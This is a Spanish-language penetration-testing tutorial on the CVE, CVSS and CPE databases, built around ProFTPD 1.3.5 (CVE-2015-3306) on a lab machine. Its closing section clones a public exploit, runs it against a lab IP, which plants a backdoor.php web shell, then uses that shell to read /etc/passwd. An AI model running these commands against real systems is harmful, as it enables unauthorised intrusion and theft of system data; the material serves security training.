# CVE, CVSS, CPE - Common Vulnerabilities and Exposures

Hay una pagina bastante famosa la cual recopila todas las vulnerabilidades que vayan exsistiendo y les asigna un numero, por lo que este numero sera el identificativo a dicha vulnerabilidad, todo esto se lo proporciona la empresa `mitre` cada vulnerabilidad que vaya saliendo se va implementando en esta base de datos:

URL = [Pagina CVE BB.DD.](https://cve.mitre.org)

Si nosotros buscamos una vulnerabilidad que sospechamos que puede ser vulnerable, podremos buscarlo en el boton de `Search CVE`, por ejemplo si buscamos una version de `FTP` que encontramos en nuestras maquinas de prueba en mi caso la de `Linux - Ubuntu` vimos que era un `ProFTPD 1.3.5`, por lo que si buscamos eso veremos que esta asignado a un `CVE-2015-3306` por lo que tiene una vulnerabilidad que se indica con ese numero y si te metes en dicha vulnerabilidad podremos ver la descripcion de en que consiste esa vulnerabilidad.

Despues te muestra las referencias donde puede encontrar mas informacion sobre esa vulnerabilidad y como se podria aprovechar para poder ser explotada.

Con este identificador que obtenemos, lo que podemos hacer es buscarlo en `google` con el identificador e investigar herramientas que esten creadas en `GitHub` con el lenguaje de programacion que queramos buscar para poder explotar estas vulnerabilidades.

Por ejemplo de esta vulnerabilidad si se busca un poco, podremos encontrar el siguiente repositorio que esta mas actual y asi nos olvidamos de algun posible fallo a la hora de explotarlo con uno mas desactualizado.

URL = [Pagina Exploit CVE-2015-3306](https://github.com/t0kx/exploit-CVE-2015-3306/tree/master)

Si por ejemplo nosotros queremos identificar que nivel de peligrosidad tiene esta vulnerabilidad, podremos hacerlo consultando la siguiente pagina:

URL = [Pagina CVSS Nivel de peligro de un CVE](https://nvd.nist.gov/vuln/search)

Si buscamos la vulnerabilidad que encontramos anteriormente, podremos ver que nos la encuentra y nos indica que es bastante alta de peligro teniendo un `10` sobre `10`:

<figure><img src="https://4289632959-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F5Wk1VNaLaqCTbfMb7tfp%2Fuploads%2Fk9Y9pl5Kg9rWZ1hziV2P%2Fimage.png?alt=media&#x26;token=aec3f339-cd87-4844-a37f-3b60eaf8a953" alt=""><figcaption></figcaption></figure>

Ya que con esta vulnerabilidad puede leer o copiar cualquier fichero del sistema, por lo que es bastante alta.

Cada una de las versiones de software tiene un `CPE` asociado, por lo que cuando sale una vulnerabilidad rapidamente podamos asociarlas con todas las versiones de ese software que se ven afectadas por esta vulnerabilidad, en esta pagina mas abajo se ven los `CPE` que van asociados a esta vulnerabilidad por los que se le puede identificar.

<figure><img src="https://4289632959-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F5Wk1VNaLaqCTbfMb7tfp%2Fuploads%2F6bO9bt4MgCxYDHEZF9UN%2Fimage.png?alt=media&#x26;token=ece06f68-ea6d-43ac-90c9-1c6b691bb93f" alt=""><figcaption></figcaption></figure>

Hay otra pagina que te engloba todo esto, por la que se puede buscar por el nombre del servicio y version, esta pagina te muestra los resultados con su `CVE` asociado y a parte tambien te muestra el riesgo de dicha vulnerabilidad, te muestra tambien el `PCE` mostrandotelo todo por lo que es mas sencillo de ver:

URL = [Pagina CVE Details](https://www.cvedetails.com)

Y con la vulnerabilidad que hemos encontrado podriamos aprovecharla en la fase de explotacion, que seria algo asi:

```shell
git clone https://github.com/t0kx/exploit-CVE-2015-3306.git
cd exploit-CVE-2015-3306/
```

```shell
./exploit.py --host 192.168.16.129 --port 21 --path /var/www/html
```

Info:

```
[+] CVE-2015-3306 exploit by t0kx
[+] Exploiting 192.168.16.129:21
[+] Target exploited, acessing shell at http://192.168.16.129/backdoor.php
[+] Running whoami: www-data
[+] Done
```

Y si nos vamos al navegador y ponemos lo siguiente:

```
URL = http://192.168.16.129/backdoor.php?cmd=cat /etc/passwd
```

Podremos ver que nos vuelca toda la informacion del archivo `passwd` y mucho mas que podremos hacer, pero esto es para la fase de explotacion.
